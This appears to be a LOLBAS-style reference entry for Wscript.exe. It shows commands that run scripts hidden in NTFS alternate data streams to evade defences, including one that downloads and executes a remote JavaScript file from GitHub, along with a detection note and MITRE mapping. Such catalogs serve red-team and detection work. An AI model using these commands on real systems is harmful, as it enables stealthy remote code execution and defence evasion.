.. / Wscript.exe
Star

Used by Windows to execute scripts


Paths:


Resources:
https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

Acknowledgement:
Oddvar Moe - @oddvarmoe
SaiLay(valen) - @404death


Detection:
Wscript.exe executing code from alternate data streams



Alternate data streams

Execute script stored in an alternate data stream 
wscript c:\ads\file.txt:script.vbs
Usecase:Execute hidden code to evade defensive counter measures
Privileges required:User
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre:T1096



Download and execute script stored in an alternate data stream 
echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
Usecase:Execute hidden code to evade defensive counter measures
Privileges required:User
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre:T1096